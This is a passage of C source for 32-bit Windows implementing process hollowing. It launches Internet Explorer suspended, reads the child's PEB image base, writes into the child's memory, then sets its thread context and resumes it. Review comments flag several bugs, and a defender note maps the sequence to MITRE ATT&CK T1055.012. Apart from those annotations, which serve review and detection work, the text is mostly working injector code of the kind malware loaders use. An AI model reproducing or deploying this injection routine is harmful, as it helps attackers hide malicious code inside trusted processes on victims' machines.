x] ",ThreadCxt.Edx);
printf("EIP = [0x%08x] ",ThreadCxt.Eip);
#endif
SetThreadContext(pi.hThread, &ThreadCxt);
ResumeThread(pi.hThread);
}
else
{
printf("WirteMemory Failed,code:%d ",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
else
{
printf("VirtualMemory Failed,code:%d ",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
return TRUE;
}
// Returns the image size recorded for the first module in the current
// process's loader list, read directly from the PEB instead of through an API.
//
// hModule is never referenced in the body; the value returned does not depend
// on it.
//
// The offsets below are the 32-bit (x86) Windows layouts and the block uses
// MSVC inline assembly, so this only builds and works as a 32-bit target.
// NOTE(review): the first InLoadOrder entry is normally the main executable;
// the code relies on that rather than checking it.
// NOTE(review): the same value is available from the PE optional header's
// SizeOfImage field of the module, without hard-coded loader offsets.
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;
_asm
{
// fs:[0x30] holds the PEB pointer on 32-bit Windows.
mov ecx,0x30
mov eax, fs:[ecx]
// PEB + 0x0c -> PEB_LDR_DATA (Ldr).
mov eax, [eax + 0x0c]
// Ldr + 0x0c -> InLoadOrderModuleList.Flink, i.e. the first loader entry.
mov esi, [eax + 0x0c]
// Entry + 0x20 is the SizeOfImage field of that loader entry.
add esi,0x20
// lodsd loads the DWORD at [esi] into eax (and advances esi).
lodsd
mov dwImageSize,eax
}
return dwImageSize;
}
// Starts the program named by szIePath as a suspended child process, captures
// the context of its initial thread, and reads the child's image base address
// out of the child's PEB.
//
// Parameters:
//   pi            - receives the process/thread handles from CreateProcess.
//   pThreadCxt    - receives the initial thread's context (CONTEXT_FULL).
//   pChildProcess - dwBaseAddress receives the DWORD read from the child's PEB.
//
// Returns TRUE whenever the if-body runs, FALSE otherwise (see the review
// notes below: the body also runs after a failed CreateProcess).
//
// 32-bit only: the code uses the x86 CONTEXT field Ebx and DWORD-sized
// pointers.
//
// Defender context: a suspended child followed by GetThreadContext and a
// cross-process read of the PEB image base is the opening of the process
// hollowing pattern (MITRE ATT&CK T1055.012). Endpoint telemetry typically
// keys on that sequence together with later cross-process writes,
// SetThreadContext and ResumeThread against the same child.
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)
{
STARTUPINFO si = {0};
DWORD *PPEB;
DWORD read;
// Start IE in suspended mode.
// NOTE(review): si.cb is left at 0; the STARTUPINFO size field is not set.
// NOTE(review): if CreateProcess fails, MessageBox is shown and its non-zero
// return value makes the condition true, so the body below still runs even
// though pi->hThread / pi->hProcess were not filled in by this call.
if( CreateProcess(NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi)||MessageBox(0,":(",":(",0))
{
pThreadCxt->ContextFlags = CONTEXT_FULL;
// NOTE(review): return value not checked; on failure Ebx below is whatever
// the caller's CONTEXT already contained.
GetThreadContext(pi->hThread, pThreadCxt);
// Ebx of the not-yet-run initial thread is treated as the child's PEB address
// (x86 process start-up convention - confirm for the targeted OS versions).
PPEB = (DWORD *)pThreadCxt->Ebx;
// &PPEB[2] is PEB + 8, the ImageBaseAddress field in the 32-bit PEB layout.
// NOTE(review): the result and the 'read' byte count are not checked, so a
// failed read leaves dwBaseAddress unchanged while TRUE is still returned.
ReadProcessMemory(pi->hProcess,&PPEB[2],(LPVOID)&(pChildProcess->dwBaseAddress),sizeof(DWORD),&read);
return TRUE ;
}
return FALSE;
}